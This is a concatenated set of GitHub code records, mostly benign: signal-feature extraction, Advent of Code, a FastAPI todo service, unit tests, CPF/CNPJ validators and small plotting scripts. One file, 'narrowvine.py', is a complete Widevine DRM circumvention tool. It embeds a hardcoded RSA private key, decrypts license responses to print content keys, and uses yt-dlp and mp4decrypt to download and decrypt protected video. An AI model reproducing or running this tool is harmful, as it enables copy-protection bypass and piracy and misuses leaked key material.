arquivo\npath='C:\corrente_10khz_10s_filtrado'\n#Set the path to the folder containing the samples\n\n# modules used by this script (no import section in the original header)\nimport os\nimport numpy as np\nimport pandas as pd\nimport pywt\nimport scipy.stats as sc\nfrom scipy import signal\nfrom statsmodels import robust\n\nFiles=getListOfFiles(path); \n\namostra=np.empty((100000), float);\n\nN_decomp_levels=5 #Set the number of wavelet decomposition levels here\n\nn=N_decomp_levels+2\n\nnCols=(n-1)*6+3\n\nDataBase=np.zeros((len(Files),nCols),float);\n\nx_array=[10] #Set how many samples should be \"skipped\" for subsampling\n\n\n\nfor x_idx in range(0,len(x_array)):\n\n    #for i in range(0, len(Files)):\n    for i in range(0, len(Files)):\n        fp=open(Files[i])\n\n        content=fp.readlines();\n        x = np.array(content[0:])\n\n        for j in range(0,100000):\n            #amostra_strings=x[j].split(',');\n            amostra[j]=np.array(x[j]);\n\n        #####################################################################################\n        \n        # Remove the mean\n        #mean=np.mean(amostra)   \n        #amostra=amostra-mean;   \n\n        x=x_array[x_idx];\n        #Digital filtering (note: the Butterworth filter is designed here but never applied; 'output' keeps the raw signal)\n        fs=10000;\n        fc =fs/(2*x)-300 ;  # Cut-off frequency of the filter \n        w = fc / (fs / 2) # Normalize the frequency\n        b, a = signal.butter(5, w, 'low')\n        output = amostra\n\n        #Subsampling\n        t=10 # Set the total time in seconds of the trimmed sample\n        n_pontos=int(t*10000)\n\n        fluxo=output[0:n_pontos:x]\n        #print(len(fluxo))\n\n        input=fluxo;\n        \n        Desvio=np.zeros((1,n-1),float)\n        MeanAD=np.zeros((1,n-1),float)\n        MedianAD=np.zeros((1,n-1),float)\n        Energia=np.zeros((1,n-1),float)\n        Kurtosis=np.zeros((1,n-1),float)\n        Skewness=np.zeros((1,n-1),float)\n        cD=np.empty((1,n-2),object)\n        \n        for m in range(0,n-2):\n            cA, cD[0,m]=pywt.dwt(input,'db2')\n            Desvio[0,m]=np.std(cD[0,m])\n            MeanAD[0,m]=pd.DataFrame(cD[0,m]).mad()\n            MedianAD[0,m]=robust.mad(cD[0,m])\n            Kurtosis[0,m]=sc.kurtosis(cD[0,m])\n            Skewness[0,m]=sc.skew(cD[0,m])\n            input=cA;\n            #print(MeanAD)    \n        #print(cA)    \n        Desvio[0,m+1]=np.std(cA)\n        MeanAD[0,m+1]=pd.DataFrame(cA).mad()\n        MedianAD[0,m+1]=robust.mad(cA)\n        Kurtosis[0,m+1]=sc.kurtosis(cA)\n        Skewness[0,m+1]=sc.skew(cA)\n        \n        Energia=EnergyPercent(cA,cD,fluxo)\n        \n        sObject=slice(39,41);\n        \n        Freq=int(Files[i][sObject]);\n\n        sObject=slice(42,44);\n\n        Load=int(Files[i][sObject]);\n        \n        sObject=slice(31,32);\n        \n        Classe=int(Files[i][sObject]);\n        \n        sObject=slice(34,38);\n        \n        Index=int(Files[i][sObject]);\n        \n        #print(Freq,Load,Classe,Index)\n\n        print(i)\n        Pattern=np.zeros((1,nCols-3),float)\n        np.concatenate((Desvio, MeanAD, MedianAD, Kurtosis, Skewness, Energia),out=Pattern,axis=1)\n        \n        \n        \n        DataBase[i,0:nCols-3]=Pattern;\n        \n        DataBase[i,nCols-3:]= [Freq, Classe,Load]\n        \n        fp.close()","repo_name":"EdibertoLima/Knn-python","sub_path":"CODIGO PYTHON/sem título1.py","file_name":"sem título1.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"13533586962","text":"class Day3:\n    rucksacks = []\n\n    chars = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n    def __init__(self, file):\n        self.rucksacks.clear()\n\n        with open(file) as f:\n            for line in f.readlines():\n                self.rucksacks.append(line.removesuffix(\"\\n\"))\n\n    def task1(self):\n        priority_list = []\n        priority_list.clear()\n        for pack in self.rucksacks:\n            first_compartment = pack[0:int(len(pack) / 2)]\n            second_compartment = pack[int(len(pack) / 2):len(pack)]\n            for letter in first_compartment:\n                if second_compartment.__contains__(letter):\n                    priority_list.append(self.chars.find(letter) + 1)\n                    break\n        return str(sum(priority_list))\n\n    def task2(self):\n        priority_list = []\n        priority_list.clear()\n        for lines in range(0, len(self.rucksacks) - 2, 3):\n            for letter 
in self.rucksacks[lines]:\n if self.rucksacks[lines + 1].__contains__(letter) and self.rucksacks[lines + 2].__contains__(letter):\n priority_list.append(self.chars.find(letter) + 1)\n break\n return str(sum(priority_list))\n","repo_name":"Nicqx/AOC-2022","sub_path":"Days/Day3.py","file_name":"Day3.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30548089818","text":"import streamlit as st \r\nimport enchant\r\n\r\nmessage = st.text_area(\"Enter Text\",\"Type Here ..\")\r\nif st.button(\"Analyze\"):\r\n# Using 'en_US' dictionary \r\n\td = enchant.Dict(\"en_US\") \r\n\tword = message\r\n\td.check(word)\r\n\tdf=d.suggest(word)\r\n\tst.json(df)","repo_name":"Gurukannan/Word_Suggestor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26471402891","text":"from fastapi import FastAPI\nfrom fastapi import HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom database import * \n\norigins = [\"https://jackmaster110.github.io\"] # This will eventually be changed to only the origins you will use once it's deployed, to secure the app a bit more.\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n@app.get(\"/\")\ndef get_root():\n return {\"Ping\": \"Pong\"}\n\n@app.get(\"/api/get-todo/{nanoid}\", response_model=Todo)\nasync def get_one_todo(nanoid):\n todo = await fetch_one_todo(nanoid)\n if not todo: raise HTTPException(404)\n return todo\n\n@app.get(\"/api/get-todo\")\nasync def get_todos():\n todos = await fetch_all_todos()\n if not todos: raise HTTPException(404)\n return todos\n\n@app.post(\"/api/add-todo\", response_model=Todo)\nasync def add_todo(todo: Todo):\n result = await create_todo(todo)\n if not result: raise HTTPException(400)\n return result\n\n@app.put(\"/api/update-todo/{nanoid}\", response_model=Todo)\nasync def update_todo(todo: Todo):\n result = await change_todo(todo.nanoid, todo.title, todo.desc, todo.checked)\n if not result: raise HTTPException(400)\n return result\n\n@app.delete(\"/api/delete-todo/{nanoid}\")\nasync def delete_todo(nanoid):\n result = await remove_todo(nanoid)\n if not result: raise HTTPException(400)\n return result\n","repo_name":"sammysheardev/farm-stack-tut-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31285636792","text":"#!/usr/bin/env python3\n\nimport os \nimport subprocess\nimport shutil\nimport glob\nimport pathlib\nimport platform\nimport time\nimport sys\nimport base64\nimport argparse\nimport socket\nimport binascii\nimport requests\nfrom pathlib import Path\nfrom urllib.request import getproxies\nfrom Cryptodome.Hash import CMAC\nfrom Cryptodome.Hash import SHA1\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.Signature import pss\n\nimport license_protocol_pb2\n\nPRIVATE_KEY = 
\"MIICXAIBAAKBgQCqGKukO1De7zhZj6+H0qtjTkVxwTCpvKe4eCZ0FPqri0cb2JZfXJ/DgYSF6vUpwmJG8wVQZKjeGcjDOL5UlsuusFncCzWBQ7RKNUSesmQRMSGkVb1/3j+skZ6UtW+5u09lHNsj6tQ51s1SPrCBkedbNf0Tp0GbMJDyR4e9T04ZZwIDAQABAoGAFijko56+qGyN8M0RVyaRAXz++xTqHBLh3tx4VgMtrQ+WEgCjhoTwo23KMBAuJGSYnRmoBZM3lMfTKevIkAidPExvYCdm5dYq3XToLkkLv5L2pIIVOFMDG+KESnAFV7l2c+cnzRMW0+b6f8mR1CJzZuxVLL6Q02fvLi55/mbSYxECQQDeAw6fiIQXGukBI4eMZZt4nscy2o12KyYner3VpoeE+Np2q+Z3pvAMd/aNzQ/W9WaI+NRfcxUJrmfPwIGm63ilAkEAxCL5HQb2bQr4ByorcMWm/hEP2MZzROV73yF41hPsRC9m66KrheO9HPTJuo3/9s5p+sqGxOlFL0NDt4SkosjgGwJAFklyR1uZ/wPJjj611cdBcztlPdqoxssQGnh85BzCj/u3WqBpE2vjvyyvyI5kX6zk7S0ljKtt2jny2+00VsBerQJBAJGC1Mg5Oydo5NwD6BiROrPxGo2bpTbu/fhrT8ebHkTz2eplU9VQQSQzY1oZMVX8i1m5WUTLPz2yLJIBQVdXqhMCQBGoiuSoSjafUhV7i1cEGpb88h5NBYZzWXGZ37sJ5QsW+sJyoNde3xH8vdXhzU7eT82D6X/scw9RZz+/6rCJ4p0=\"\n\nPUBLIC_KEY = \"MIIBCgKCAQEA61BjmfXGEvWmegnBGSuS+rU9soUg2FnODva32D1AqhwdziwHINFaD1MVlcrYG6XRKfkcxnaXGfFDWHLEvNBSEVCgJjtHAGZIm5GL/KA86KDp/CwDFMSwluowcXwDwoyinmeOY9eKyh6aY72xJh7noLBBq1N0bWi1e2i+83txOCg4yV2oVXhBo8pYEJ8LT3el6Smxol3C1oFMVdwPgc0vTl25XucMcG/ALE/KNY6pqC2AQ6R2ERlVgPiUWOPatVkt7+Bs3h5Ramxh7XjBOXeulmCpGSynXNcpZ/06+vofGi/2MlpQZNhHAo8eayMp6FcvNucIpUndo1X8dKMv3Y26ZQIDAQAB\"\n\ndef read_pssh(path: str):\n\traw = Path(path).read_bytes()\n\tpssh_offset = raw.rfind(b'pssh')\n\t_start = pssh_offset - 4\n\t_end = pssh_offset - 4 + raw[pssh_offset-1]\n\tpssh = raw[_start:_end]\n\treturn pssh\n\nclass WidevineCDM:\n\tdef __init__(self, license_url: str):\n\t\tself.private_key = binascii.a2b_hex(PRIVATE_KEY)\n\t\tself.public_key = binascii.a2b_hex(PUBLIC_KEY)\n\t\tself.proxies = getproxies()\n\t\tself.license_url = license_url\n\t\tself.header={\"Cookie\": \"\"}\n\t\t\n\tdef generateRequestData(self, pssh: bytes):\n\t\t_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t_socket.settimeout(1)\n\t\ttry:\n\t\t\t_socket.connect((\"127.0.0.1\", 8888))\n\t\t\t_socket.send(pssh)\n\t\t\trecv = _socket.recv(10240)\n\t\texcept Exception as e:\n\t\t\tprint(f\"socket recv data failed. --> {e}\")\n\t\t\t_socket.close()\n\t\t\treturn\n\t\t_socket.close()\n\t\treturn recv\n\t\n\tdef verify(self, msg: bytes, signature: bytes):\n\n\t\t_hash = SHA1.new(msg)\n\t\tpublic_key = RSA.importKey(self.public_key)\n\t\tverifier = pss.new(public_key)\n\t\tres = verifier.verify(_hash, signature)\n\t\tprint(f\"verify result is --> {res}\")\n\t\t\n\tdef license_request(self, payload):\n\t\ttry:\n\t\t\tr = requests.post(self.license_url, data=payload, headers=self.header, proxies=self.proxies)\n\t\texcept Exception as e:\n\t\t\tsys.exit(f\"request license failed. 
--> {e}\")\n\t\treturn r.content\n\t\n\tdef getContentKey(self, license_request_data: bytes, license_response_data: bytes):\n\t\tlicenseMessage = license_protocol_pb2.License()\n\t\trequestMessage=license_protocol_pb2.SignedMessage()\n\t\tresponseMessage = license_protocol_pb2.SignedMessage()\n\t\trequestMessage.ParseFromString(license_request_data)\n\t\tresponseMessage.ParseFromString(license_response_data)\n\t\t\n\t\toaep_key = RSA.importKey(self.private_key)\n\t\tcipher = PKCS1_OAEP.new(oaep_key)\n\t\tcmac_key = cipher.decrypt(responseMessage.session_key)\n\t\t\n\t\t_cipher = CMAC.new(cmac_key, ciphermod=AES)\n\t\t_auth_key = b'\\x01ENCRYPTION\\x00' + requestMessage.msg + b\"\\x00\\x00\\x00\\x80\"\n\t\tenc_cmac_key = _cipher.update(_auth_key).digest()\n\t\t\n\t\tlicenseMessage.ParseFromString(responseMessage.msg)\n\t\tglobal KEY_ARRAY\n\t\tKEY_ARRAY=[]\n\t\tfor key in licenseMessage.key:\n\t\t\tcryptos = AES.new(enc_cmac_key, AES.MODE_CBC, iv=key.iv[0:16])\n\t\t\tdkey = cryptos.decrypt(key.key[0:16])\n#\t\t\tprint(\"KID:\", binascii.b2a_hex(key.id).decode('utf-8'), \"KEY:\",binascii.b2a_hex(dkey).decode('utf-8'))\n\t\t\tKEY_ARRAY.append(\"%s:%s\"%(binascii.b2a_hex(key.id).decode('utf-8'),binascii.b2a_hex(dkey).decode('utf-8')))\n\t\tKEY_ARRAY.remove(KEY_ARRAY[0])\n\t\tfor item in KEY_ARRAY:\n\t\t\tprint(\"[info][Found KEY] %s\"%item)\n\t\t\n\tdef work(self, pssh: bytes):\n\t\tlicense_request_data = self.generateRequestData(pssh)\n\t\tif license_request_data is None:\n\t\t\tsys.exit(\"generate requests data failed.\")\n\t\tlicense_response_data = self.license_request(license_request_data)\n\t\tself.getContentKey(license_request_data, license_response_data)\n\t\t\ndef getkeys(init_path,license_url):\n\tpssh = read_pssh(init_path)\n\tcdm = WidevineCDM(license_url)\n\tcdm.work(pssh)\n\t\nFILE_DIRECTORY=str(pathlib.Path(__file__).parent.absolute())\nTEMPORARY_PATH = FILE_DIRECTORY+\"/cache\"\nOUTPUT_PATH = FILE_DIRECTORY+\"/output\"\nVIDEO_ID = \"bv\"\nAUDIO_ID = \"ba\"\n\ndef osinfo():\n\tglobal PLATFORM\n\tif platform.system()== \"Darwin\":\n\t\tPLATFORM = \"Mac\"\n\telse:\n\t\tPLATFORM = platform.system()\n\ndef divider():\n\tcount = int(shutil.get_terminal_size().columns)\n\tcount = count - 1\n\tprint('-' * count)\n\t\ndef empty_folder(folder):\n\tfiles = glob.glob('%s/*'%folder)\n\tfor f in files:\n\t\tos.remove(f)\n\tprint(\"Emptied Temporary Files!\")\n\tdivider()\n\tquit()\n\t\ndef parse_key (prompt):\n\tglobal key,kid,keys\n\tkey = prompt[30 : 62]\n\tkid = prompt[68 : 100]\n\tkeys = \"--key %s:%s\"%(kid,key)\n\treturn key,kid,keys\n\ndef download_drm_content(mpd_url):\n\tdivider()\n\tprint(\"Processing Video Info..\")\n\tos.system('yt-dlp --external-downloader aria2c --no-warnings --allow-unplayable-formats --no-check-certificate -F \"%s\"'%mpd_url)\n\tdivider()\n\tVIDEO_ID = input(\"ENTER VIDEO_ID (Press Enter for Best): \")\n\tif VIDEO_ID == \"\":\n\t\tVIDEO_ID = \"bv\"\n\t\n\tAUDIO_ID = input(\"ENTER AUDIO_ID (Press Enter for Best): \")\n\tif AUDIO_ID == \"\":\n\t\tAUDIO_ID = \"ba\"\n\t\n\tdivider()\n\tprint(\"Downloading Encrypted Video from CDN..\")\t\n\tos.system(f'yt-dlp -o \"{TEMPORARY_PATH}/encrypted_video.%(ext)s\" --no-warnings --external-downloader aria2c --allow-unplayable-formats --no-check-certificate -f {VIDEO_ID} \"{mpd_url}\"')\n\tprint(\"Downloading Encrypted Audio from CDN..\")\n\tos.system(f'yt-dlp -o \"{TEMPORARY_PATH}/encrypted_audio.%(ext)s\" --no-warnings --external-downloader aria2c --allow-unplayable-formats --no-check-certificate -f {AUDIO_ID} \"{mpd_url}\"')\n
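# (added note, not in the original) mp4decrypt expects one \"--key KID:KEY\" argument per track,\n# with KID and KEY as 32-char hex strings; KEY_ARRAY above already stores pairs in that \"kid:key\" form\n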
\ndef decrypt_content():\n\tif PLATFORM == \"Windows\":\n\t\tkey_arg = \"\"\n\t\tfor items in KEY_ARRAY:\n\t\t\tkey_temp = \" --key %s\"%items\n\t\t\tkey_arg += key_temp\n\t\t\tkey_temp = \"\"\n\t\tkeys = key_arg\n\t\t\t\n\telse:\n\t\tparse_key(KEY_PROMPT)\n\t\t\n\tdivider()\n\tprint(\"Decrypting WideVine DRM.. (Takes some time)\")\n\tosinfo()\n\tif PLATFORM == \"Mac\":\n\t\tMP4DECRYPT_PATH = \"%s/mp4decrypt/mp4decrypt_mac\"%FILE_DIRECTORY\n\telif PLATFORM == \"Windows\":\n\t\tMP4DECRYPT_PATH = \"%s/mp4decrypt/mp4decrypt_win.exe\"%FILE_DIRECTORY\n\telif PLATFORM == \"Linux\":\n\t\tMP4DECRYPT_PATH = \"%s/mp4decrypt/mp4decrypt_linux\"%FILE_DIRECTORY\n\telse:\n\t\tMP4DECRYPT_PATH = \"mp4decrypt\"\n\t\t\n\tos.system('%s %s/encrypted_video.mp4 %s/decrypted_video.mp4 %s --show-progress'%(MP4DECRYPT_PATH,TEMPORARY_PATH,TEMPORARY_PATH,keys))\n\tos.system('%s %s/encrypted_audio.m4a %s/decrypted_audio.m4a %s --show-progress'%(MP4DECRYPT_PATH,TEMPORARY_PATH,TEMPORARY_PATH,keys))\n\tprint(\"[info] Decryption Complete!\")\n\ndef merge_content():\n\tglobal FILENAME\n\tFFMPEG_PATH = \"%s/ffmpeg.exe\"%FILE_DIRECTORY\n\tdivider()\n\tFILENAME=input(\"Enter File Name (with extension): \\n> \")\n\tdivider()\n\tprint(\"Merging Files and Processing %s.. (Takes a while)\"%FILENAME)\n\ttime.sleep(2)\n\tif PLATFORM == \"Windows\":\n\t\tos.system('%s -i %s/decrypted_video.mp4 -i %s/decrypted_audio.m4a -c:v copy -c:a copy %s/\"%s\"'%(FFMPEG_PATH,TEMPORARY_PATH,TEMPORARY_PATH,OUTPUT_PATH,FILENAME))\n\telse: \n\t\tos.system('ffmpeg --hide-banner -i %s/decrypted_video.mp4 -i %s/decrypted_audio.m4a -c:v copy -c:a copy %s/\"%s\"'%(TEMPORARY_PATH,TEMPORARY_PATH,OUTPUT_PATH,FILENAME))\n\t\t\nparser=argparse.ArgumentParser()\nparser.add_argument('-mpd', required=False, default=\"NULL\")\nparser.add_argument('-license', required=False, default=\"NULL\")\nargs = parser.parse_args()\n\nMPD_URL = args.mpd\nLICENSE_URL = args.license\n\ndef manual_input():\n\tglobal MPD_URL, LICENSE_URL, KEY_PROMPT\n\tMPD_URL = input(\"Enter MPD URL: \\n> \")\n\tdivider()\n\tLICENSE_URL = input(\"Enter License URL: \\n> \")\n\tif PLATFORM == \"Windows\":\n\t\tpass\n\telse:\n\t\tKEY_PROMPT = input(\"Enter WideVineDecryptor Prompt: \\n> \")\n\nosinfo()\ndivider()\nprint(\"**** NARROWVINE by vank0n **** (%s Detected)\"%PLATFORM)\ndivider()\n\nif PLATFORM == \"Windows\":\n\tif MPD_URL == \"NULL\" or LICENSE_URL == \"NULL\":\n\t\tmanual_input()\n\telse:\n\t\tpass\nelse:\n\tmanual_input()\n\tdivider()\n\nif PLATFORM == \"Windows\":\n\tdivider()\n\tprint(\"Starting Widevine Proxy.. (DO NOT CLOSE THE PROXY WINDOW!)\")\n\tos.startfile(\"%s/license_proxy.exe\"%FILE_DIRECTORY)\n\tdownload_drm_content(MPD_URL)\n\tdivider()\n\tprint(\"Extracting Widevine Keys..\")\n\tgetkeys(\"%s/encrypted_video.mp4\"%TEMPORARY_PATH,LICENSE_URL)\nelse:\n\tdownload_drm_content(MPD_URL)\n\tdivider()\n\ndecrypt_content()\nmerge_content()\ndivider()\nprint(\"[info] Process Finished. Final Video File is saved in /output directory.\")\nif PLATFORM == \"Windows\":\n\tos.startfile(\"%s/%s\"%(OUTPUT_PATH,FILENAME))\ndivider()\n\n
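# (added note) the decrypted intermediates stay in /cache, so a failed merge can be retried without re-downloading\n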
delete_choice = input(\"Delete cache files? (y/n)\\ny) Yes (default)\\nn) No\\ny/n> \")\n\nif delete_choice == \"n\":\n\tdivider()\nelse:\n\tempty_folder(TEMPORARY_PATH)\n\ntime.sleep(2)\n","repo_name":"myck786/8888","sub_path":"narrowvine.py","file_name":"narrowvine.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"}
{"seq_id":"8535628824","text":"#Written by Jacob J. Edginton\nimport numpy as np\nimport matplotlib.image\nfrom skimage import data\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread, imshow\n\n\n#load image, different images can be loaded as long as they are in the correct folder, or the path is specified\nimage=imread('beam.jpg', as_gray=True) #RGB code generated by letting as_gray=False\n\n#imshow(image) #you can use this to view the image you have loaded \n\n\n#Define xy plane of object based on image array \ny = image[500]\nx=np.array(range(0,len(y)))\n\n\n#Slice data to the linear region\nw = y[(x<1600) & (x>300)]\nz = x[(x<1600) & (x>300)]\n\n\n#Fit data to a straight line\nfit_im,cov_im = np.polyfit(z,w,1,cov=True)\nsig_0 = np.sqrt(cov_im[0,0]) #The uncertainty in the slope\nsig_1 = np.sqrt(cov_im[1,1]) #The uncertainty in the intercept\npSpace=np.poly1d(fit_im)\n\n\n#Output relevant parameters\nprint('Slope = %.3e +/- %.3e' %(fit_im[0],sig_0))\nprint('Intercept = %.3e +/- %.3e' %(fit_im[1],sig_1))\n\n#Plot fitted data\nplt.xlabel('X - Position (cm)')\nplt.plot(z,w,color='#ff781f')\nplt.plot(z,pSpace(z))\nplt.show()\n","repo_name":"Jacob-J-E/Cycle-Two-Lab","sub_path":"Beer-Lambert/Jacob Investigating the Beer-Lambert Law/SKimage.py","file_name":"SKimage.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"32937888677","text":"maths = []\n\nwith open('student_performance.csv') as f:\n\n    for line in f:\n        info = line.split(',')\n        if info[0] == '\"gender\"':\n            continue\n        else:\n            grade = int(info[5][1:-1])\n            maths.append(grade)\na = max(maths)\n\ncount= 0\nmath_score_mean = sum(maths) / len(maths)\nprint(math_score_mean)\n#for i in maths:\n   # if i < a:\n       # count += 1\n\n\n#NUMBER OF STUDENTS WITH THE HIGHEST SCORE\n#count= 0\n#for i in maths:\n   # if i == a:\n       # count += 1\n#print(int(count))\n","repo_name":"roshak7/test_sf_analitics","sub_path":"работа с файлам/чтение файлов студентов/resuts.py","file_name":"resuts.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"25228246284","text":"#!/usr/bin/env python3\n\"\"\"Tests for objects.\"\"\"\n\nimport numpy as np\nfrom numpy.random import rand\nfrom pytest import raises\n\nfrom nigsp import operations\nfrom nigsp.objects import SCGraph\n\n\n# ### Unit tests\ndef test_SCGraph():\n    \"\"\"Test SCGraph, properties, and methods.\"\"\"\n    # # Initialise object\n    # Initialise content\n    mtx = rand(4, 4)\n    timeseries = rand(4, 6)\n    atlas = rand(4, 3)\n    filename = \"Laudna.nii.gz\"\n    ts_split = {\"high\": rand(4, 6), \"low\": rand(4, 6)}\n\n    # Initialise eigenvec to check zerocross\n    def _bonnet(d, x):\n        if d == 0:\n            return np.ones_like(x)\n        elif d == 1:\n            return x\n        else:\n            return (\n                (2 * d - 1) * x * _bonnet(d - 1, x) - (d - 1) * _bonnet(d - 2, x)\n            ) / d\n\n    x = np.linspace(-1, 1, 4)\n    eigenvec = np.empty([4, 4], dtype=\"float32\")\n    for n in range(4):\n        eigenvec[:, n] = _bonnet(n, x)\n    zx = np.linspace(0, 3, 4)\n\n    # Initialise SCGraph proper\n    
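# (added note) _bonnet implements Bonnet's recursion for Legendre polynomials, so column n of\n    # eigenvec changes sign n times and zx = [0, 1, 2, 3] is the expected per-column zero-crossing count\n    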
scgraph = SCGraph(\n mtx,\n timeseries,\n atlas=atlas,\n filename=filename,\n eigenvec=eigenvec,\n ts_split=ts_split,\n index=2,\n )\n\n # # Assert properties\n assert scgraph.nnodes == mtx.shape[1]\n assert scgraph.ntimepoints == timeseries.shape[1]\n assert (scgraph.zerocross == zx).all()\n assert all(item in scgraph.split_keys for item in list(ts_split.keys()))\n\n # # Test methods\n # Only test split_graph, create_surrogates, compute_fc\n # Other methods are somewhat one-liner wrap-around of tested functions.\n\n # Test split_graph and split_graph index priority\n scgraph.split_graph()\n evs, tss = operations.graph_filter(timeseries, eigenvec, 2)\n # Update ts_split to be tss\n ts_split = tss\n\n assert all(item in list(evs.keys()) for item in list(scgraph.evec_split.keys()))\n assert all(item in list(tss.keys()) for item in list(scgraph.ts_split.keys()))\n assert (evs[\"low\"] == scgraph.evec_split[\"low\"]).all()\n assert (tss[\"low\"] == scgraph.ts_split[\"low\"]).all()\n\n scgraph.evec_split = {}\n scgraph.index = \"median\"\n scgraph.split_graph(index=2)\n\n assert (evs[\"low\"] == scgraph.evec_split[\"low\"]).all()\n\n # Test create_surrogates\n scgraph.create_surrogates(sc_type=\"informed\", n_surr=1, seed=6)\n i_surr = operations.sc_informed(timeseries, eigenvec, n_surr=1, seed=6)\n assert (scgraph.surr == i_surr).all()\n\n scgraph.lapl_mtx = mtx\n scgraph.create_surrogates(sc_type=\"uninformed\", n_surr=1, seed=6)\n u_surr = operations.sc_uninformed(timeseries, lapl_mtx=mtx, n_surr=1, seed=6)\n assert (scgraph.surr == u_surr).all()\n\n # Test compute_fc\n scgraph.compute_fc()\n fc = operations.functional_connectivity(timeseries)\n fc_low = operations.functional_connectivity(ts_split[\"low\"])\n\n assert (fc == scgraph.fc).all()\n assert all(item in [\"high\", \"low\"] for item in list(scgraph.fc_split.keys()))\n assert (fc_low == scgraph.fc_split[\"low\"]).all()\n\n\n# ### Break tests\ndef test_break_SCGraph():\n \"\"\"Break SCGraph and its methods.\"\"\"\n with raises(ValueError) as errorinfo:\n SCGraph(rand(3, 4), rand(4, 6))\n assert \"square matrix\" in str(errorinfo.value)\n\n with raises(ValueError) as errorinfo:\n SCGraph(rand(4, 4), rand(3, 6))\n assert \"number of parcels and nodes\" in str(errorinfo.value)\n\n with raises(ValueError) as errorinfo:\n SCGraph(rand(4, 4), rand(4, 6, 4, 5))\n assert \"more than 3 dimensions\" in str(errorinfo.value)\n\n scgraph = SCGraph(rand(4, 4), rand(4, 6), index=\"Chet\")\n with raises(ValueError) as errorinfo:\n scgraph.split_graph()\n assert \"Unknown option Chet\" in str(errorinfo.value)\n\n scgraph = SCGraph(rand(4, 4), rand(4, 6))\n with raises(ValueError) as errorinfo:\n scgraph.create_surrogates(sc_type=\"Fearne\")\n assert \"Unknown option Fearne\" in str(errorinfo.value)\n","repo_name":"MIPLabCH/nigsp","sub_path":"nigsp/tests/test_objects.py","file_name":"test_objects.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"35930892967","text":"import re\n\nclass Verifica:\n def cpf_soma(self, data, soma, indice):\n \n soma += int(data[indice]) * self.contador\n \n self.contador -= 1\n if (self.contador >= 2):\n return self.cpf_soma(data, soma, indice+1)\n return soma\n\n def cpf_divisao(self, data, soma):\n resto = soma * 10 % 11 if soma * 10 % 11 != 10 else 0\n return True if data == resto else False\n\n def cpf(self, data):\n # padroniza a string\n data = ''.join(re.findall(r\"[\\w']+\", data))\n\n # verifica se é um cpf 
de numeros repetidos (all digits equal)\n        if data in [s * 11 for s in [str(n) for n in range(10)]]:\n            return False\n\n        # first check digit verification\n        self.contador = 10\n        soma = self.cpf_soma(data, 0, 0)\n        if (self.cpf_divisao(int(data[9]), soma)):\n            # second check digit verification\n            self.contador = 11\n            soma = self.cpf_soma(data, 0, 0)\n            if (self.cpf_divisao(int(data[10]), soma)):\n                return True\n        return False\n\n    def cnpj(self, data):\n        # normalize the string (keep word characters only)\n        data = ''.join(re.findall(r\"[\\w']+\", data))\n\n        # check whether the CNPJ is made of repeated digits (a CNPJ has 14 digits)\n        if data in [s * 14 for s in [str(n) for n in range(10)]]:\n            return False\n        \n        inteiros = list(map(int, data))\n        novo = inteiros[:12]\n\n        prod = [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\n        while len(novo) < 14:\n            r = sum([x*y for (x, y) in zip(novo, prod)]) % 11\n            if r > 1:\n                f = 11 - r\n            else:\n                f = 0\n            novo.append(f)\n            prod.insert(0, 6)\n\n        # If the regenerated number matches the original, the CNPJ is valid\n        if novo == inteiros:\n            return True\n        return False\n\n","repo_name":"giovannabbottino/LGPD","sub_path":"controller_verificadora.py","file_name":"controller_verificadora.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"18969044171","text":"import sys\nimport cv2\nimport csv\nimport re\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom collections import Counter\nfrom create_circle import midPointCircleDraw\n\ndef isNumber(x):\n\ttry:\n\t\tfloat(x)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False\n\ndef intGaussPoint2D(mean, cov, grid):\n\tpoint = tuple(np.round(np.random.multivariate_normal(mean, cov)).astype(int))\n\twhile(not(point in grid)):\n\t\tpoint = tuple(np.round(np.random.multivariate_normal(mean, cov)).astype(int))\n\treturn point\n\ndef truncGauss(mu, sigma, bottom, top):\n\trand = int(random.gauss(mu, sigma))\n\twhile(rand < bottom or rand > top):\n\t\trand = int(random.gauss(mu, sigma))\n\treturn rand\n\ndef interpolateImg(img_path, px_per_km, hosp_coord=None, max_dist=None):\n\t#np.set_printoptions(threshold = sys.maxsize)\n\n\timage = cv2.imread(img_path)\n\tlowerbound = np.array([0, 0, 0]) # BGR-code of the lowest black\n\tupperbound = np.array([30, 30, 30]) # BGR-code of the highest black \n\tmask = cv2.inRange(image, lowerbound, upperbound) \n\t#get all non zero values\n\tcoord = cv2.findNonZero(mask)\n\n\tpoints = coord[:,0]\n\tgrid = np.floor(points / 